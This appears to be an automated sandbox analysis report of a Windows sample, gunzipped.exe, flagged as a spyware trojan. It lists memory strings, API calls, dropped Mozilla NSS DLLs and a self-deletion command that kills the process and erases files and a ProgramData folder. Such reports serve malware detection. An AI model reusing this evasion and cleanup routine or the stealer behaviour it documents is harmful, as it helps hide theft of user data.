Source: gunzipped.exe, 00000001.00000003.317919411.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.317143663.00000000031F1000.00000004.00000001.sdmp, softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: mozglue.dll.1.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: gunzipped.exe, 00000001.00000003.317919411.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.317143663.00000000031F1000.00000004.00000001.sdmp, softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr	String found in binary or memory: http://www.mozilla.com0
Source: gunzipped.exe, 00000001.00000003.326516330.0000000000C97000.00000004.00000001.sdmp, temp.1.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: gunzipped.exe, 00000001.00000003.326516330.0000000000C97000.00000004.00000001.sdmp, temp.1.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: gunzipped.exe, 00000001.00000003.326516330.0000000000C97000.00000004.00000001.sdmp, temp.1.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: gunzipped.exe, 00000001.00000003.326516330.0000000000C97000.00000004.00000001.sdmp, temp.1.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: gunzipped.exe, 00000001.00000003.326516330.0000000000C97000.00000004.00000001.sdmp, temp.1.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: gunzipped.exe, 00000001.00000003.326516330.0000000000C97000.00000004.00000001.sdmp, temp.1.dr	String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: gunzipped.exe, 00000001.00000003.326516330.0000000000C97000.00000004.00000001.sdmp, temp.1.dr	String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: gunzipped.exe, 00000001.00000002.333464446.00000000031F0000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: gunzipped.exe, 00000001.00000002.333464446.00000000031F0000.00000004.00000001.sdmp	String found in binary or memory: https://support.google.com/chrome/answer/6258784
Source: gunzipped.exe, 00000001.00000003.317919411.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.317143663.00000000031F1000.00000004.00000001.sdmp, softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: gunzipped.exe, 00000001.00000003.326516330.0000000000C97000.00000004.00000001.sdmp, temp.1.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: unknown

Source: C:\Users\user\Desktop\gunzipped.exe

Code function: 1_2_007D1CF0 InternetSetFilePointer,InternetReadFile,_memset,HttpQueryInfoA,_memcpy_s,_memcpy_s,

1_2_007D1CF0

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality for read data from the clipboard

Source: C:\Users\user\Desktop\gunzipped.exe

Code function: 0_2_00404DEB GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_00404DEB

System Summary:

Uses 32bit PE files

Source: gunzipped.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Contains functionality to shutdown / reboot the system

Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_004030C7 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,		0_2_004030C7
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 1_2_0040315E CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,		1_2_0040315E

Detected potential crypto function

Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_004045FC	0_2_004045FC
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F33727E	0_2_6F33727E
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F309F37	0_2_6F309F37
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F309320	0_2_6F309320
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F33FB2D	0_2_6F33FB2D
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F307303	0_2_6F307303
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F308F07	0_2_6F308F07
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F308B0F	0_2_6F308B0F
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F308B64	0_2_6F308B64
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F30936B	0_2_6F30936B
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F307340	0_2_6F307340
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F309F48	0_2_6F309F48
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F30A74A	0_2_6F30A74A
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F308F4E	0_2_6F308F4E
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F3073B3	0_2_6F3073B3
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F30A3A7	0_2_6F30A3A7
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F308FAF	0_2_6F308FAF
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F3093F6	0_2_6F3093F6
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F309FF8	0_2_6F309FF8
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F33D3E2	0_2_6F33D3E2
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F33EBC1	0_2_6F33EBC1
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F308BC2	0_2_6F308BC2
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F30963B	0_2_6F30963B
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F308610	0_2_6F308610
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F308E1C	0_2_6F308E1C
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F33CE70	0_2_6F33CE70
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F335A60	0_2_6F335A60
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F308E69	0_2_6F308E69
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F303F55	0_2_6F303F55
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F308A51	0_2_6F308A51
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F3072A7	0_2_6F3072A7
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F319040	0_2_6F319040
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F30A2AE	0_2_6F30A2AE
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F309E96	0_2_6F309E96
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F309EE9	0_2_6F309EE9
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F3092D0	0_2_6F3092D0
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F30A134	0_2_6F30A134
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F309937	0_2_6F309937
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F308D3A	0_2_6F308D3A
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F309522	0_2_6F309522
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F307529	0_2_6F307529
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F304758	0_2_6F304758
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F309D17	0_2_6F309D17
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F308505	0_2_6F308505
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F33BD05	0_2_6F33BD05
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F309165	0_2_6F309165
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F308D67	0_2_6F308D67
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F33D954	0_2_6F33D954
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F301CD1	0_2_6F301CD1
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F3085BD	0_2_6F3085BD
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F309DA1	0_2_6F309DA1
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F3031AC	0_2_6F3031AC
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F3095D4	0_2_6F3095D4
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F308DD7	0_2_6F308DD7
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F309DDF	0_2_6F309DDF
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F30B9C3	0_2_6F30B9C3
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F309430	0_2_6F309430
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F30A038	0_2_6F30A038
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F30A439	0_2_6F30A439
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F308817	0_2_6F308817
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F30A078	0_2_6F30A078
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F30747A	0_2_6F30747A
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F30947B	0_2_6F30947B
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F309860	0_2_6F309860
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F309061	0_2_6F309061
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F308C5F	0_2_6F308C5F
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F319040	0_2_6F319040
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F309C42	0_2_6F309C42
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F3094B0	0_2_6F3094B0
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F30A0BA	0_2_6F30A0BA
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F308CA6	0_2_6F308CA6
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F3098AC	0_2_6F3098AC
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F308881	0_2_6F308881
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F30A0F2	0_2_6F30A0F2
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F3090F8	0_2_6F3090F8
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F3094FC	0_2_6F3094FC
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F3090DF	0_2_6F3090DF
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 1_2_004045FC	1_2_004045FC
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 1_2_007C3C90	1_2_007C3C90
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 1_2_007C3480	1_2_007C3480
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 1_2_007C3060	1_2_007C3060
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 1_2_007C3AA0	1_2_007C3AA0
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 1_2_007B4B10	1_2_007B4B10

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\gunzipped.exe	Code function: String function: 007B8C20 appears 41 times
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: String function: 004029E8 appears 47 times
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: String function: 007D2F70 appears 391 times

Contains functionality to call native functions

Source: C:\Users\user\Desktop\gunzipped.exe

Code function: 0_2_0019F1B7 NtQueryInformationProcess,

0_2_0019F1B7

Sample file is different than original file name gathered from version info

Source: gunzipped.exe, 00000000.00000003.306104413.0000000002E06000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs gunzipped.exe
Source: gunzipped.exe, 00000000.00000003.310975930.0000000002F9F000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs gunzipped.exe
Source: gunzipped.exe, 00000001.00000003.319062332.0000000003341000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamemsvcp140.dll^ vs gunzipped.exe
Source: gunzipped.exe, 00000001.00000003.317919411.00000000031F1000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamemozglue.dll8 vs gunzipped.exe
Source: gunzipped.exe, 00000001.00000003.321977073.00000000031F7000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamevcruntime140.dll^ vs gunzipped.exe
Source: gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamesoftokn3.dll8 vs gunzipped.exe
Source: gunzipped.exe, 00000001.00000003.318870361.00000000031F1000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamemsvcp140.dll^ vs gunzipped.exe
Source: gunzipped.exe, 00000001.00000003.317143663.00000000031F1000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenamefreebl3.dll8 vs gunzipped.exe

PE file contains more sections than normal

Source: sqlite3.dll.1.dr

Static PE information: Number of sections : 19 > 10

Source: gunzipped.exe

ReversingLabs: Detection: 53%

Source: C:\Users\user\Desktop\gunzipped.exe

File read: C:\Users\user\Desktop\gunzipped.exe

Jump to behavior

Source: gunzipped.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\gunzipped.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\gunzipped.exe "C:\Users\user\Desktop\gunzipped.exe"
Source: C:\Users\user\Desktop\gunzipped.exe	Process created: C:\Users\user\Desktop\gunzipped.exe "C:\Users\user\Desktop\gunzipped.exe"
Source: C:\Users\user\Desktop\gunzipped.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /pid 1068 & erase C:\Users\user\Desktop\gunzipped.exe & RD /S /Q C:\\ProgramData\\834793065949733\\* & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /pid 1068
Source: C:\Users\user\Desktop\gunzipped.exe	Process created: C:\Users\user\Desktop\gunzipped.exe "C:\Users\user\Desktop\gunzipped.exe"	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /pid 1068 & erase C:\Users\user\Desktop\gunzipped.exe & RD /S /Q C:\\ProgramData\\834793065949733\\* & exit	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /pid 1068	Jump to behavior

Source: C:\Users\user\Desktop\gunzipped.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\taskkill.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( ProcessId = 1068)

Source: C:\Users\user\Desktop\gunzipped.exe

File created: C:\Users\user\AppData\Local\Temp\nsy255E.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@8/15@0/1

Source: C:\Users\user\Desktop\gunzipped.exe

Code function: 0_2_00402012 CoCreateInstance,MultiByteToWideChar,

0_2_00402012

Source: C:\Users\user\Desktop\gunzipped.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\gunzipped.exe

Code function: 0_2_004040FF GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

0_2_004040FF

Source: gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp, softokn3.dll.1.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp, softokn3.dll.1.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp, softokn3.dll.1.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: gunzipped.exe, 00000001.00000003.315501907.00000000033F0000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.316221160.0000000003341000.00000004.00000001.sdmp, sqlite3.dll.1.dr, nss3.dll.1.dr	Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: nss3.dll.1.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);docid INTEGER PRIMARY KEY%z, 'c%d%q'%z, langidCREATE TABLE %Q.'%q_content'(%s)CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);m
Source: gunzipped.exe, 00000001.00000003.315501907.00000000033F0000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.316221160.0000000003341000.00000004.00000001.sdmp, sqlite3.dll.1.dr	Binary or memory string: SELECT 'DELETE FROM vacuum_db.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: gunzipped.exe, 00000001.00000003.315501907.00000000033F0000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.316221160.0000000003341000.00000004.00000001.sdmp, sqlite3.dll.1.dr	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp, softokn3.dll.1.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: gunzipped.exe, 00000001.00000003.315501907.00000000033F0000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.316221160.0000000003341000.00000004.00000001.sdmp, sqlite3.dll.1.dr, nss3.dll.1.dr	Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp, softokn3.dll.1.dr	Binary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
Source: gunzipped.exe, 00000001.00000003.315501907.00000000033F0000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.316221160.0000000003341000.00000004.00000001.sdmp, sqlite3.dll.1.dr	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: gunzipped.exe, 00000001.00000003.315501907.00000000033F0000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.316221160.0000000003341000.00000004.00000001.sdmp, sqlite3.dll.1.dr	Binary or memory string: CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
Source: gunzipped.exe, 00000001.00000003.315501907.00000000033F0000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.316221160.0000000003341000.00000004.00000001.sdmp, sqlite3.dll.1.dr, nss3.dll.1.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: gunzipped.exe, 00000001.00000003.315501907.00000000033F0000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.316221160.0000000003341000.00000004.00000001.sdmp, sqlite3.dll.1.dr, nss3.dll.1.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: gunzipped.exe, 00000001.00000003.315501907.00000000033F0000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.316221160.0000000003341000.00000004.00000001.sdmp, sqlite3.dll.1.dr, nss3.dll.1.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp, softokn3.dll.1.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp, softokn3.dll.1.dr	Binary or memory string: SELECT ALL id FROM %s;
Source: gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp, softokn3.dll.1.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp, softokn3.dll.1.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: gunzipped.exe, 00000001.00000003.315501907.00000000033F0000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.316221160.0000000003341000.00000004.00000001.sdmp, sqlite3.dll.1.dr, nss3.dll.1.dr	Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: gunzipped.exe, 00000001.00000003.315501907.00000000033F0000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.316221160.0000000003341000.00000004.00000001.sdmp, sqlite3.dll.1.dr, nss3.dll.1.dr	Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: gunzipped.exe, 00000001.00000003.315501907.00000000033F0000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.316221160.0000000003341000.00000004.00000001.sdmp, sqlite3.dll.1.dr, nss3.dll.1.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: nss3.dll.1.dr	Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index / path TEXT, / Path to page from root / pageno INTEGER, / Page number / pagetype TEXT, / 'internal', 'leaf' or 'overflow' / ncell INTEGER, / Cells on page (0 for overflow) / payload INTEGER, / Bytes of payload on this page / unused INTEGER, / Bytes of unused space on this page / mx_payload INTEGER, / Largest payload size of all cells / pgoffset INTEGER, / Offset of page in file / pgsize INTEGER, / Size of the page / schema TEXT HIDDEN / Database schema being analyzed */);
Source: gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp, softokn3.dll.1.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: nss3.dll.1.dr	Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index / path TEXT, / Path to page from root / pageno INTEGER, / Page number / pagetype TEXT, / 'internal', 'leaf' or 'overflow' / ncell INTEGER, / Cells on page (0 for overflow) / payload INTEGER, / Bytes of payload on this page / unused INTEGER, / Bytes of unused space on this page / mx_payload INTEGER, / Largest payload size of all cells / pgoffset INTEGER, / Offset of page in file / pgsize INTEGER, / Size of the page / schema TEXT HIDDEN / Database schema being analyzed */);/overflow%s%.3x+%.6x%s%.3x/internalleafcorruptedno such schema: %sSELECT 'sqlite_master' AS name, 1 AS rootpage, 'table' AS type UNION ALL SELECT name, rootpage, type FROM "%w".%s WHERE rootpage!=0 ORDER BY namedbstat2018-01-22 18:45:57 0c55d179733b46d8d0ba4d88e01a25e10677046ee3da1d5b1581e86726f2171d:

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4140:120:WilError_01

Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp, softokn3.dll.1.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: gunzipped.exe, 00000001.00000003.317143663.00000000031F1000.00000004.00000001.sdmp, freebl3.dll.1.dr
Source:	Binary string: vcruntime140.i386.pdb source: gunzipped.exe, 00000001.00000003.321468040.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.321977073.00000000031F7000.00000004.00000001.sdmp, vcruntime140.dll.1.dr
Source:	Binary string: vcruntime140.i386.pdbGCTL source: gunzipped.exe, 00000001.00000003.321468040.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.321977073.00000000031F7000.00000004.00000001.sdmp, vcruntime140.dll.1.dr
Source:	Binary string: msvcp140.i386.pdbGCTL source: gunzipped.exe, 00000001.00000003.318155773.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.318261807.000000000326F000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.318870361.00000000031F1000.00000004.00000001.sdmp, msvcp140.dll.1.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: gunzipped.exe, 00000001.00000003.317919411.00000000031F1000.00000004.00000001.sdmp, mozglue.dll.1.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: gunzipped.exe, 00000001.00000003.317919411.00000000031F1000.00000004.00000001.sdmp, mozglue.dll.1.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp, softokn3.dll.1.dr
Source:	Binary string: wntdll.pdbUGP source: gunzipped.exe, 00000000.00000003.305023865.0000000002CF0000.00000004.00000001.sdmp, gunzipped.exe, 00000000.00000003.308187403.0000000002E80000.00000004.00000001.sdmp
